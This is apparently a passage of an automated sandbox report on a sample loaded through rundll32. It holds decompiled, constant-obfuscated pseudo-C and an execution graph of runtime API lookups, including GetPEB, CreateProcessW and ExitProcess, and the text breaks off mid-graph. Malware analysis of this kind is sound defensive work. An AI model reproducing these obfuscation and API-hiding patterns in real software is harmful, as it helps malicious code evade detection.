                                                                                                                                                                            				_v84 = 0x8573c6;
                                                                                                                                                                            				_t253 = 0x4b;
                                                                                                                                                                            				_v84 = _v84 / _t253;
                                                                                                                                                                            				_v84 = _v84 | 0x42242f90;
                                                                                                                                                                            				_v84 = _v84 >> 0xc;
                                                                                                                                                                            				_v84 = _v84 ^ 0x00008b33;
                                                                                                                                                                            				_v100 = 0x3509ce;
                                                                                                                                                                            				_t254 = 0x19;
                                                                                                                                                                            				_v100 = _v100 / _t254;
                                                                                                                                                                            				_t285 = 0x44;
                                                                                                                                                                            				_t255 = 0x6f;
                                                                                                                                                                            				_v100 = _v100 * 0x31;
                                                                                                                                                                            				_v100 = _v100 + 0x6b64;
                                                                                                                                                                            				_v100 = _v100 ^ 0x006714bf;
                                                                                                                                                                            				_v68 = 0x65eeb7;
                                                                                                                                                                            				_v68 = _v68 + 0x24bd;
                                                                                                                                                                            				_v68 = _v68 << 7;
                                                                                                                                                                            				_v68 = _v68 ^ 0x330bb4b3;
                                                                                                                                                                            				_v72 = 0x31388d;
                                                                                                                                                                            				_v72 = _v72 * 0x77;
                                                                                                                                                                            				_v72 = _v72 / _t285;
                                                                                                                                                                            				_v72 = _v72 ^ 0x00560572;
                                                                                                                                                                            				_v76 = 0x10ecc2;
                                                                                                                                                                            				_v76 = _v76 | 0x28471304;
                                                                                                                                                                            				_v76 = _v76 + 0xcdda;
                                                                                                                                                                            				_v76 = _v76 ^ 0x285661a5;
                                                                                                                                                                            				_v44 = 0xf32c83;
                                                                                                                                                                            				_v44 = _v44 / _t255;
                                                                                                                                                                            				_v44 = _v44 / _t285;
                                                                                                                                                                            				_v44 = _v44 ^ 0x000ff213;
                                                                                                                                                                            				_v80 = 0xb9f4a0;
                                                                                                                                                                            				_v80 = _v80 << 0xa;
                                                                                                                                                                            				_v80 = _v80 + 0xd38f;
                                                                                                                                                                            				_v80 = _v80 >> 8;
                                                                                                                                                                            				_v80 = _v80 ^ 0x00ede5ae;
                                                                                                                                                                            				_v12 = 0x138f30;
                                                                                                                                                                            				_v12 = _v12 ^ 0xf49e1969;
                                                                                                                                                                            				_v12 = _v12 ^ 0xf48aec3a;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t242 = 0xd8fe181;
                                                                                                                                                                            					do {
                                                                                                                                                                            						L2:
                                                                                                                                                                            						while(_t283 != 0x72ed85) {
                                                                                                                                                                            							if(_t283 == 0xb6c7232) {
                                                                                                                                                                            								_t278 = _v52;
                                                                                                                                                                            								_t255 = _v48;
                                                                                                                                                                            								_t243 = E00C41005(_v48, _v52, _v16, _v84,  *((intOrPtr*)(_t282 + 0x38)));
                                                                                                                                                                            								_t287 =  &(_t287[3]);
                                                                                                                                                                            								 *((intOrPtr*)(_t282 + 0x2c)) = _t243;
                                                                                                                                                                            								__eflags = _t243;
                                                                                                                                                                            								_t242 = 0xd8fe181;
                                                                                                                                                                            								_t283 =  !=  ? 0xd8fe181 : 0xd6f812a;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_t283 == 0xc5020c9) {
                                                                                                                                                                            								_push(_v64);
                                                                                                                                                                            								_t244 = E00C43263(_v36, _v60, __eflags, _t248, _v40, _t255);
                                                                                                                                                                            								_t288 =  &(_t287[4]);
                                                                                                                                                                            								 *((intOrPtr*)(_t282 + 0x38)) = _t244;
                                                                                                                                                                            								__eflags = _t244;
                                                                                                                                                                            								if(_t244 != 0) {
                                                                                                                                                                            									E00C4148A(_t244, _t244, _v88, _v32, _v92, _v96);
                                                                                                                                                                            									_t278 = _v56;
                                                                                                                                                                            									_t255 = _v20;
                                                                                                                                                                            									E00C2E2BD(_v56, _v24,  *((intOrPtr*)(_t282 + 0x38)), _v28);
                                                                                                                                                                            									_t287 =  &(_t288[7]);
                                                                                                                                                                            									_t283 = 0xb6c7232;
                                                                                                                                                                            									goto L1;
                                                                                                                                                                            								}
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t283 == 0xd6f812a) {
                                                                                                                                                                            									return E00C2F0E9(_v44,  *((intOrPtr*)(_t282 + 0x38)), _v80, _v12);
                                                                                                                                                                            								}
                                                                                                                                                                            								if(_t283 != _t242) {
                                                                                                                                                                            									goto L13;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t244 = E00C30EBC(_v100, _t278, _v68, _v100, _v72, _v76, _v100, _t255, _t282, E00C425F1);
                                                                                                                                                                            									_t287 =  &(_t287[8]);
                                                                                                                                                                            									 *((intOrPtr*)(_t282 + 0x48)) = _t244;
                                                                                                                                                                            									if(_t244 == 0) {
                                                                                                                                                                            										_t283 = 0xd6f812a;
                                                                                                                                                                            										while(1) {
                                                                                                                                                                            											L1:
                                                                                                                                                                            											_t242 = 0xd8fe181;
                                                                                                                                                                            											goto L2;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            							return _t244;
                                                                                                                                                                            						}
                                                                                                                                                                            						_t283 = 0xc5020c9;
                                                                                                                                                                            						L13:
                                                                                                                                                                            						__eflags = _t283 - 0x11d9bb5;
                                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                                            					return _t242;
                                                                                                                                                                            				}
                                                                                                                                                                            			}










































                                                                                                                                                                            0x00c3ccd9
                                                                                                                                                                            0x00c3ccdc
                                                                                                                                                                            0x00c3cce1
                                                                                                                                                                            0x00c3cce9
                                                                                                                                                                            0x00c3ccf1
                                                                                                                                                                            0x00c3ccf9
                                                                                                                                                                            0x00c3cd01
                                                                                                                                                                            0x00c3cd11
                                                                                                                                                                            0x00c3cd13
                                                                                                                                                                            0x00c3cd19
                                                                                                                                                                            0x00c3cd1e
                                                                                                                                                                            0x00c3cd23
                                                                                                                                                                            0x00c3cd29
                                                                                                                                                                            0x00c3cd31
                                                                                                                                                                            0x00c3cd39
                                                                                                                                                                            0x00c3cd45
                                                                                                                                                                            0x00c3cd4a
                                                                                                                                                                            0x00c3cd50
                                                                                                                                                                            0x00c3cd58
                                                                                                                                                                            0x00c3cd65
                                                                                                                                                                            0x00c3cd66
                                                                                                                                                                            0x00c3cd6a
                                                                                                                                                                            0x00c3cd72
                                                                                                                                                                            0x00c3cd7a
                                                                                                                                                                            0x00c3cd82
                                                                                                                                                                            0x00c3cd8a
                                                                                                                                                                            0x00c3cd92
                                                                                                                                                                            0x00c3cd97
                                                                                                                                                                            0x00c3cd9f
                                                                                                                                                                            0x00c3cdac
                                                                                                                                                                            0x00c3cdb0
                                                                                                                                                                            0x00c3cdb8
                                                                                                                                                                            0x00c3cdc0
                                                                                                                                                                            0x00c3cdc8
                                                                                                                                                                            0x00c3cdd0
                                                                                                                                                                            0x00c3cdd5
                                                                                                                                                                            0x00c3cddd
                                                                                                                                                                            0x00c3cde5
                                                                                                                                                                            0x00c3cdea
                                                                                                                                                                            0x00c3cdf2
                                                                                                                                                                            0x00c3cdfa
                                                                                                                                                                            0x00c3ce02
                                                                                                                                                                            0x00c3ce0a
                                                                                                                                                                            0x00c3ce0f
                                                                                                                                                                            0x00c3ce17
                                                                                                                                                                            0x00c3ce1f
                                                                                                                                                                            0x00c3ce27
                                                                                                                                                                            0x00c3ce2f
                                                                                                                                                                            0x00c3ce37
                                                                                                                                                                            0x00c3ce3f
                                                                                                                                                                            0x00c3ce44
                                                                                                                                                                            0x00c3ce4c
                                                                                                                                                                            0x00c3ce54
                                                                                                                                                                            0x00c3ce5c
                                                                                                                                                                            0x00c3ce64
                                                                                                                                                                            0x00c3ce6c
                                                                                                                                                                            0x00c3ce74
                                                                                                                                                                            0x00c3ce7c
                                                                                                                                                                            0x00c3ce84
                                                                                                                                                                            0x00c3ce8c
                                                                                                                                                                            0x00c3ce94
                                                                                                                                                                            0x00c3ce9c
                                                                                                                                                                            0x00c3cea4
                                                                                                                                                                            0x00c3ceb2
                                                                                                                                                                            0x00c3ceb6
                                                                                                                                                                            0x00c3cec0
                                                                                                                                                                            0x00c3cece
                                                                                                                                                                            0x00c3ced3
                                                                                                                                                                            0x00c3ced7
                                                                                                                                                                            0x00c3cedf
                                                                                                                                                                            0x00c3cee4
                                                                                                                                                                            0x00c3ceec
                                                                                                                                                                            0x00c3cefa
                                                                                                                                                                            0x00c3ceff
                                                                                                                                                                            0x00c3cf0a
                                                                                                                                                                            0x00c3cf0d
                                                                                                                                                                            0x00c3cf0e
                                                                                                                                                                            0x00c3cf12
                                                                                                                                                                            0x00c3cf1a
                                                                                                                                                                            0x00c3cf22
                                                                                                                                                                            0x00c3cf2a
                                                                                                                                                                            0x00c3cf32
                                                                                                                                                                            0x00c3cf37
                                                                                                                                                                            0x00c3cf3f
                                                                                                                                                                            0x00c3cf4c
                                                                                                                                                                            0x00c3cf58
                                                                                                                                                                            0x00c3cf5c
                                                                                                                                                                            0x00c3cf64
                                                                                                                                                                            0x00c3cf6c
                                                                                                                                                                            0x00c3cf74
                                                                                                                                                                            0x00c3cf7c
                                                                                                                                                                            0x00c3cf84
                                                                                                                                                                            0x00c3cf94
                                                                                                                                                                            0x00c3cfa3
                                                                                                                                                                            0x00c3cfa7
                                                                                                                                                                            0x00c3cfaf
                                                                                                                                                                            0x00c3cfb7
                                                                                                                                                                            0x00c3cfbc
                                                                                                                                                                            0x00c3cfc4
                                                                                                                                                                            0x00c3cfc9
                                                                                                                                                                            0x00c3cfd1
                                                                                                                                                                            0x00c3cfd9
                                                                                                                                                                            0x00c3cfe1
                                                                                                                                                                            0x00c3cfe9
                                                                                                                                                                            0x00c3cfe9
                                                                                                                                                                            0x00c3cfe9
                                                                                                                                                                            0x00c3cfee
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00c3cfee
                                                                                                                                                                            0x00c3d000
                                                                                                                                                                            0x00c3d0bc
                                                                                                                                                                            0x00c3d0c0
                                                                                                                                                                            0x00c3d0c4
                                                                                                                                                                            0x00c3d0c9
                                                                                                                                                                            0x00c3d0cc
                                                                                                                                                                            0x00c3d0cf
                                                                                                                                                                            0x00c3d0d3
                                                                                                                                                                            0x00c3d0d8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00c3d0d8
                                                                                                                                                                            0x00c3d00c
                                                                                                                                                                            0x00c3d04e
                                                                                                                                                                            0x00c3d060
                                                                                                                                                                            0x00c3d065
                                                                                                                                                                            0x00c3d068
                                                                                                                                                                            0x00c3d06b
                                                                                                                                                                            0x00c3d06d
                                                                                                                                                                            0x00c3d087
                                                                                                                                                                            0x00c3d097
                                                                                                                                                                            0x00c3d09b
                                                                                                                                                                            0x00c3d09f
                                                                                                                                                                            0x00c3d0a4
                                                                                                                                                                            0x00c3d0a7
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00c3d0a7
                                                                                                                                                                            0x00c3d00e
                                                                                                                                                                            0x00c3d010
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00c3d108
                                                                                                                                                                            0x00c3d018
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00c3d01e
                                                                                                                                                                            0x00c3d037
                                                                                                                                                                            0x00c3d03c
                                                                                                                                                                            0x00c3d03f
                                                                                                                                                                            0x00c3d044
                                                                                                                                                                            0x00c3d04a
                                                                                                                                                                            0x00c3cfe9
                                                                                                                                                                            0x00c3cfe9
                                                                                                                                                                            0x00c3cfe9
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00c3cfe9
                                                                                                                                                                            0x00c3cfe9
                                                                                                                                                                            0x00c3d044
                                                                                                                                                                            0x00c3d018
                                                                                                                                                                            0x00c3d110
                                                                                                                                                                            0x00c3d110
                                                                                                                                                                            0x00c3d0e0
                                                                                                                                                                            0x00c3d0e5
                                                                                                                                                                            0x00c3d0e5
                                                                                                                                                                            0x00c3d0e5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00c3cfee

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.263561510.0000000000C21000.00000020.00000001.sdmp, Offset: 00C20000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.263555474.0000000000C20000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000007.00000002.263585875.0000000000C46000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_c20000_rundll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CursorFrameInfo
                                                                                                                                                                            • String ID: #]$$P$Cn$Hc:$R{L$dk
                                                                                                                                                                            • API String ID: 453930150-1551317889
                                                                                                                                                                            • Opcode ID: 5c71e18673849c114cf4ca4d07069c595d78b2e42f99aa07ab28101e84cf1546
                                                                                                                                                                            • Instruction ID: 0949a826789e4b99daf96d95a28fbc2063999688e3a199b661d491d7e16f118b
                                                                                                                                                                            • Opcode Fuzzy Hash: 5c71e18673849c114cf4ca4d07069c595d78b2e42f99aa07ab28101e84cf1546
                                                                                                                                                                            • Instruction Fuzzy Hash: EBB142B29083419FD358CF66C54941BFBE2FBC8748F108A2DF59996260D3B5CA49CF82
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Execution Graph

                                                                                                                                                                            Execution Coverage:3.5%
                                                                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                            Total number of Nodes:1073
                                                                                                                                                                            Total number of Limit Nodes:5

                                                                                                                                                                            Graph

                                                                                                                                                                            execution_graph 3913 4c46395 3914 4c46453 3913->3914 3918 4c4647e 3913->3918 3919 4c4efdd 3914->3919 3922 4c4f548 3919->3922 3923 4c4f760 3922->3923 3926 4c46466 3922->3926 3928 4c4e1f8 GetPEB 3922->3928 3931 4c4fecb GetPEB 3922->3931 3935 4c5061d 3922->3935 3939 4c31a34 3922->3939 3953 4c50db1 3922->3953 3957 4c52d0a 3922->3957 3961 4c4fe2a 3922->3961 3965 4c3c307 3922->3965 3943 4c485ff 3923->3943 3926->3918 3932 4c4d11a 3926->3932 3928->3922 3931->3922 3933 4c3eb52 GetPEB 3932->3933 3934 4c4d1b1 ExitProcess 3933->3934 3934->3918 3936 4c50636 3935->3936 3968 4c3eb52 3936->3968 3940 4c31a59 3939->3940 3941 4c3eb52 GetPEB 3940->3941 3942 4c31aeb 3941->3942 3942->3922 3944 4c48626 3943->3944 3945 4c4fe2a GetPEB 3944->3945 3946 4c4878e 3945->3946 3998 4c52c24 3946->3998 3948 4c487c7 3949 4c487d2 3948->3949 4002 4c51538 3948->4002 3949->3926 3952 4c51538 GetPEB 3952->3949 3954 4c50dcc 3953->3954 4006 4c4bb96 3954->4006 3958 4c52d2f 3957->3958 4010 4c531aa 3958->4010 3962 4c4fe3d 3961->3962 4013 4c3c28c 3962->4013 3966 4c3eb52 GetPEB 3965->3966 3967 4c3c39e 3966->3967 3967->3922 3969 4c3ebf7 3968->3969 3973 4c3ec1b lstrcmpiW 3968->3973 3974 4c4567b 3969->3974 3971 4c3ec06 3977 4c3ec31 3971->3977 3973->3922 3981 4c3f7f7 GetPEB 3974->3981 3976 4c4573b 3976->3971 3979 4c3ec50 3977->3979 3978 4c3ed2e 3978->3973 3979->3978 3982 4c37e79 3979->3982 3981->3976 3983 4c37fa7 3982->3983 3990 4c3801a 3983->3990 3986 4c37fe4 3988 4c38011 3986->3988 3989 4c3ec31 GetPEB 3986->3989 3988->3978 3989->3988 3991 4c3802d 3990->3991 3992 4c3eb52 GetPEB 3991->3992 3993 4c37fcb 3992->3993 3993->3986 3994 4c3483c 3993->3994 3995 4c3484c 3994->3995 3996 4c3eb52 GetPEB 3995->3996 3997 4c348d1 3996->3997 3997->3986 3999 4c52c57 3998->3999 4000 4c3eb52 GetPEB 3999->4000 4001 4c52ced CreateProcessW 4000->4001 4001->3948 4003 4c51548 4002->4003 4004 4c3eb52 GetPEB 4003->4004 4005 4c487ec 4004->4005 4005->3952 4007 4c4bbbe 4006->4007 4008 4c3eb52 GetPEB 4007->4008 4009 4c4bc5c 4008->4009 4009->3922 4011 4c3eb52 GetPEB 4010->4011 4012 4c52d4b 4011->4012 4012->3922 4014 4c3c2a9 4013->4014 4017 4c376e0 4014->4017 4018 4c376f8 4017->4018 4019 4c3eb52 GetPEB 4018->4019 4020 4c37793 4019->4020 4020->3922 5172 4c4a2a5 5173 4c4a419 5172->5173 5174 4c44244 GetPEB 5173->5174 5179 4c4a467 5173->5179 5175 4c4a434 5174->5175 5180 4c53560 5175->5180 5178 4c4fecb GetPEB 5178->5179 5181 4c5357f 5180->5181 5182 4c4a44b 5181->5182 5184 4c4bddd 5181->5184 5182->5178 5185 4c4bdf6 5184->5185 5186 4c3eb52 GetPEB 5185->5186 5187 4c4be7e 5186->5187 5187->5181 4021 4c3f1cb 4026 4c38636 4021->4026 4023 4c3f26d 4024 4c4d11a 2 API calls 4023->4024 4025 4c3f281 4024->4025 4058 4c39ad5 4026->4058 4027 4c3a3e5 4276 4c427f9 4027->4276 4030 4c50e63 GetPEB 4030->4058 4035 4c3a3c7 4266 4c517bd 4035->4266 4036 4c3a3c5 4036->4023 4049 4c43d85 GetPEB 4049->4058 4056 4c52b09 GetPEB 4056->4058 4058->4027 4058->4030 4058->4035 4058->4036 4058->4049 4058->4056 4059 4c4fecb GetPEB 4058->4059 4063 4c51028 4058->4063 4067 4c44f74 4058->4067 4075 4c42142 4058->4075 4089 4c3670b 4058->4089 4097 4c377a3 4058->4097 4102 4c330e7 4058->4102 4107 4c52699 4058->4107 4111 4c4bd13 4058->4111 4115 4c4d1bc 4058->4115 4125 4c3bdf9 4058->4125 4128 4c43eaa 4058->4128 4134 4c3de74 4058->4134 4144 4c4e955 4058->4144 4155 4c34b5d 4058->4155 4158 4c52009 4058->4158 4169 4c3c6b8 4058->4169 4182 4c3d14c 4058->4182 4195 4c4c5d5 4058->4195 4199 4c4fbde 4058->4199 4204 4c44a66 4058->4204 4214 4c4ad08 4058->4214 4224 4c4c387 4058->4224 4229 4c4e4e5 4058->4229 4241 4c49a01 4058->4241 4250 4c48d3d 4058->4250 4257 4c3a445 4058->4257 4059->4058 4064 4c51041 4063->4064 4065 4c3eb52 GetPEB 4064->4065 4066 4c510cd 4065->4066 4066->4058 4072 4c4522f 4067->4072 4070 4c45328 4070->4058 4072->4070 4073 4c52d0a GetPEB 4072->4073 4290 4c4e1f8 4072->4290 4294 4c4fecb 4072->4294 4298 4c409dd 4072->4298 4302 4c4437a 4072->4302 4073->4072 4077 4c42628 4075->4077 4076 4c4e1f8 GetPEB 4076->4077 4077->4076 4078 4c427af 4077->4078 4081 4c42793 4077->4081 4083 4c3c5d8 GetPEB 4077->4083 4086 4c42791 4077->4086 4088 4c4fecb GetPEB 4077->4088 4352 4c48b9e 4077->4352 4356 4c3738a 4077->4356 4079 4c52b09 GetPEB 4078->4079 4084 4c427c9 4079->4084 4360 4c3f7fe 4081->4360 4083->4077 4087 4c52b09 GetPEB 4084->4087 4086->4058 4087->4086 4088->4077 4093 4c36a16 4089->4093 4091 4c50db1 GetPEB 4091->4093 4093->4091 4095 4c51538 GetPEB 4093->4095 4096 4c36b43 4093->4096 4364 4c545ca 4093->4364 4368 4c4dbc1 4093->4368 4372 4c4ca1f 4093->4372 4095->4093 4096->4058 4098 4c377cc 4097->4098 4099 4c37e67 4098->4099 4100 4c3c5d8 GetPEB 4098->4100 4101 4c4cad5 GetPEB 4098->4101 4099->4058 4100->4098 4101->4098 4105 4c331a7 4102->4105 4104 4c3325b 4104->4058 4105->4104 4376 4c5161b 4105->4376 4380 4c52a36 4105->4380 4108 4c526b3 4107->4108 4109 4c527a6 4108->4109 4110 4c4ff58 GetPEB 4108->4110 4109->4058 4110->4108 4112 4c4bd2c 4111->4112 4113 4c3eb52 GetPEB 4112->4113 4114 4c4bdd2 4113->4114 4114->4058 4122 4c4d202 4115->4122 4116 4c4fe2a GetPEB 4116->4122 4120 4c4d8c2 4120->4058 4122->4116 4122->4120 4124 4c52b09 GetPEB 4122->4124 4384 4c36b7a 4122->4384 4392 4c45779 4122->4392 4404 4c380c0 4122->4404 4414 4c42e5d 4122->4414 4432 4c467e6 4122->4432 4124->4122 4126 4c3c5d8 GetPEB 4125->4126 4127 4c3be8c 4126->4127 4127->4058 4133 4c44051 4128->4133 4129 4c4416b 4129->4058 4130 4c409dd GetPEB 4130->4133 4133->4129 4133->4130 4584 4c3dd35 4133->4584 4587 4c40aba 4133->4587 4141 4c3e069 4134->4141 4135 4c3e1e6 4643 4c354b6 4135->4643 4138 4c52b09 GetPEB 4138->4141 4139 4c3e1e4 4139->4058 4141->4135 4141->4138 4141->4139 4143 4c3c307 GetPEB 4141->4143 4628 4c4e0f2 4141->4628 4632 4c48c7d 4141->4632 4636 4c4f840 4141->4636 4143->4141 4150 4c4edaa 4144->4150 4145 4c545ca GetPEB 4145->4150 4146 4c4efc1 4147 4c51538 GetPEB 4146->4147 4148 4c4efbf 4147->4148 4148->4058 4149 4c4e1f8 GetPEB 4149->4150 4150->4145 4150->4146 4150->4148 4150->4149 4152 4c52d0a GetPEB 4150->4152 4153 4c4ca1f GetPEB 4150->4153 4154 4c4fecb GetPEB 4150->4154 4651 4c544ff 4150->4651 4152->4150 4153->4150 4154->4150 4156 4c51028 GetPEB 4155->4156 4157 4c34bf5 4156->4157 4157->4058 4159 4c3556b GetPEB 4158->4159 4165 4c52465 4159->4165 4160 4c525bf 4662 4c4654a 4160->4662 4162 4c52d0a GetPEB 4162->4165 4163 4c4e1f8 GetPEB 4163->4165 4164 4c525bd 4164->4058 4165->4160 4165->4162 4165->4163 4165->4164 4168 4c4fecb GetPEB 4165->4168 4655 4c3dc1b 4165->4655 4658 4c544ad 4165->4658 4168->4165 4177 4c3cdac 4169->4177 4170 4c4e1f8 GetPEB 4170->4177 4175 4c3cdf0 4684 4c353d0 4175->4684 4176 4c31a34 GetPEB 4176->4177 4177->4170 4177->4175 4177->4176 4178 4c3d05c 4177->4178 4180 4c4fecb GetPEB 4177->4180 4688 4c400c5 4177->4688 4692 4c42cd9 4177->4692 4696 4c32dea 4177->4696 4700 4c3f96f 4177->4700 4178->4178 4180->4177 4193 4c3d807 4182->4193 4183 4c3da79 4185 4c33046 GetPEB 4183->4185 4184 4c31a34 GetPEB 4184->4193 4188 4c3da77 4185->4188 4188->4058 4189 4c4e1f8 GetPEB 4189->4193 4192 4c3f96f GetPEB 4192->4193 4193->4183 4193->4184 4193->4188 4193->4189 4193->4192 4194 4c4fecb GetPEB 4193->4194 4704 4c33046 4193->4704 4708 4c4b257 4193->4708 4721 4c47c4e 4193->4721 4725 4c4e8b6 4193->4725 4194->4193 4197 4c4c7d3 4195->4197 4196 4c3dc1b GetPEB 4196->4197 4197->4196 4198 4c4c8ad 4197->4198 4198->4058 4200 4c4fcf5 4199->4200 4202 4c4fd44 4200->4202 4203 4c3c5d8 GetPEB 4200->4203 4745 4c49df5 4200->4745 4202->4058 4203->4200 4206 4c44ded 4204->4206 4205 4c33046 GetPEB 4205->4206 4206->4205 4207 4c31a34 GetPEB 4206->4207 4208 4c3c5d8 GetPEB 4206->4208 4209 4c44f25 4206->4209 4212 4c44f23 4206->4212 4213 4c4e8b6 GetPEB 4206->4213 4774 4c407f4 4206->4774 4207->4206 4208->4206 4211 4c50db1 GetPEB 4209->4211 4211->4212 4212->4058 4213->4206 4216 4c4b06a 4214->4216 4215 4c50db1 GetPEB 4215->4216 4216->4215 4217 4c4e1f8 GetPEB 4216->4217 4218 4c4b173 4216->4218 4219 4c4654a GetPEB 4216->4219 4220 4c4b171 4216->4220 4222 4c52d0a GetPEB 4216->4222 4223 4c4fecb GetPEB 4216->4223 4217->4216 4781 4c47a0f 4218->4781 4219->4216 4220->4058 4222->4216 4223->4216 4225 4c3556b GetPEB 4224->4225 4226 4c4c401 4225->4226 4795 4c4b19c 4226->4795 4230 4c4e50b 4229->4230 4231 4c3c5d8 GetPEB 4230->4231 4237 4c4e8a9 4230->4237 4799 4c47d5b 4230->4799 4819 4c500ef 4230->4819 4831 4c3b820 4230->4831 4838 4c3a871 4230->4838 4859 4c4ccd9 4230->4859 4867 4c3238c 4230->4867 4888 4c4a474 4230->4888 4908 4c52d53 4230->4908 4231->4230 4237->4058 4245 4c49a1f 4241->4245 4243 4c49c42 4244 4c52b09 GetPEB 4243->4244 4249 4c49c40 4244->4249 4245->4243 4248 4c3c5d8 GetPEB 4245->4248 4245->4249 5021 4c3dca0 4245->5021 5025 4c53ee9 4245->5025 5035 4c33271 4245->5035 4248->4245 4249->4058 4251 4c48f0d 4250->4251 4253 4c48f1d 4251->4253 4254 4c3c5d8 GetPEB 4251->4254 4256 4c48f3c 4251->4256 5130 4c348dd 4251->5130 4255 4c40ebc GetPEB 4253->4255 4254->4251 4255->4256 4256->4058 4264 4c3a713 4257->4264 4259 4c3a84e 4261 4c33046 GetPEB 4259->4261 4260 4c3ee62 GetPEB 4260->4264 4262 4c3a84c 4261->4262 4262->4058 4263 4c4e8b6 GetPEB 4263->4264 4264->4259 4264->4260 4264->4262 4264->4263 4265 4c33046 GetPEB 4264->4265 5134 4c31e9b 4264->5134 4265->4264 4267 4c517de 4266->4267 4268 4c51f31 4267->4268 4270 4c51f2f 4267->4270 4271 4c31a34 GetPEB 4267->4271 4272 4c4e1f8 GetPEB 4267->4272 4274 4c4fecb GetPEB 4267->4274 4275 4c3f96f GetPEB 4267->4275 5138 4c3bf5f 4267->5138 4269 4c485ff 2 API calls 4268->4269 4269->4270 4270->4036 4271->4267 4272->4267 4274->4267 4275->4267 4284 4c42b33 4276->4284 4279 4c42c60 4280 4c409dd GetPEB 4279->4280 4283 4c42c75 4280->4283 4281 4c4654a GetPEB 4281->4284 4282 4c4e1f8 GetPEB 4282->4284 5156 4c3856e 4283->5156 4284->4279 4284->4281 4284->4282 4286 4c52d0a GetPEB 4284->4286 4287 4c42c5e 4284->4287 4288 4c3a445 GetPEB 4284->4288 4289 4c4fecb GetPEB 4284->4289 5142 4c4dc71 4284->5142 5150 4c31ca1 4284->5150 4286->4284 4287->4036 4288->4284 4289->4284 4291 4c4e211 4290->4291 4314 4c3c5d8 4291->4314 4295 4c4fee3 4294->4295 4326 4c52b09 4295->4326 4299 4c409f3 4298->4299 4300 4c3eb52 GetPEB 4299->4300 4301 4c40a85 4300->4301 4301->4072 4304 4c443a8 4302->4304 4305 4c44a52 4304->4305 4308 4c4e1f8 GetPEB 4304->4308 4309 4c44a50 4304->4309 4311 4c52d0a GetPEB 4304->4311 4312 4c4fecb GetPEB 4304->4312 4313 4c4437a GetPEB 4304->4313 4336 4c42c9c 4304->4336 4340 4c42da7 4304->4340 4344 4c50f1e 4304->4344 4348 4c3bea1 4305->4348 4308->4304 4309->4072 4311->4304 4312->4304 4313->4304 4319 4c528eb 4314->4319 4320 4c3eb52 GetPEB 4319->4320 4321 4c3c69c 4320->4321 4322 4c4648a 4321->4322 4323 4c464a6 4322->4323 4324 4c3eb52 GetPEB 4323->4324 4325 4c3c6b1 4324->4325 4325->4072 4327 4c52b1f 4326->4327 4328 4c528eb GetPEB 4327->4328 4329 4c52bd9 4328->4329 4332 4c40c2a 4329->4332 4333 4c40c42 4332->4333 4334 4c3eb52 GetPEB 4333->4334 4335 4c40ce9 4334->4335 4335->4072 4337 4c42cb8 4336->4337 4338 4c531aa GetPEB 4337->4338 4339 4c42cd1 4338->4339 4339->4304 4341 4c42dbd 4340->4341 4342 4c3eb52 GetPEB 4341->4342 4343 4c42e4f 4342->4343 4343->4304 4345 4c50f37 4344->4345 4346 4c3eb52 GetPEB 4345->4346 4347 4c50ff6 4346->4347 4347->4304 4349 4c3beb1 4348->4349 4350 4c3eb52 GetPEB 4349->4350 4351 4c3bf53 4350->4351 4351->4309 4353 4c48bc0 4352->4353 4354 4c3eb52 GetPEB 4353->4354 4355 4c48c6a 4354->4355 4355->4077 4357 4c373a9 4356->4357 4358 4c3eb52 GetPEB 4357->4358 4359 4c3742e 4358->4359 4359->4077 4361 4c3f814 4360->4361 4362 4c3eb52 GetPEB 4361->4362 4363 4c3f892 4362->4363 4363->4086 4365 4c545fd 4364->4365 4366 4c3eb52 GetPEB 4365->4366 4367 4c546a3 4366->4367 4367->4093 4369 4c4dbe1 4368->4369 4370 4c3eb52 GetPEB 4369->4370 4371 4c4dc5f 4370->4371 4371->4093 4373 4c4ca35 4372->4373 4374 4c3eb52 GetPEB 4373->4374 4375 4c4cac9 4374->4375 4375->4093 4377 4c51631 4376->4377 4378 4c3eb52 GetPEB 4377->4378 4379 4c516b5 4378->4379 4379->4105 4381 4c52a49 4380->4381 4382 4c3eb52 GetPEB 4381->4382 4383 4c52afe 4382->4383 4383->4105 4385 4c36b9c 4384->4385 4386 4c52b09 GetPEB 4385->4386 4388 4c3706b 4385->4388 4390 4c3c5d8 GetPEB 4385->4390 4449 4c507aa 4385->4449 4454 4c4c9b0 4385->4454 4458 4c546bd 4385->4458 4386->4385 4388->4122 4390->4385 4403 4c457ab 4392->4403 4393 4c52b09 GetPEB 4393->4403 4394 4c46086 4396 4c52b09 GetPEB 4394->4396 4399 4c46084 4396->4399 4397 4c357b8 GetPEB 4397->4403 4399->4122 4401 4c4c9b0 GetPEB 4401->4403 4402 4c3c5d8 GetPEB 4402->4403 4403->4393 4403->4394 4403->4397 4403->4399 4403->4401 4403->4402 4507 4c35026 4403->4507 4511 4c3e7de 4403->4511 4516 4c3fb8e 4403->4516 4412 4c383f1 4404->4412 4405 4c4e1f8 GetPEB 4405->4412 4406 4c3854c 4407 4c52b09 GetPEB 4406->4407 4409 4c3854a 4407->4409 4409->4122 4410 4c531aa GetPEB 4410->4412 4411 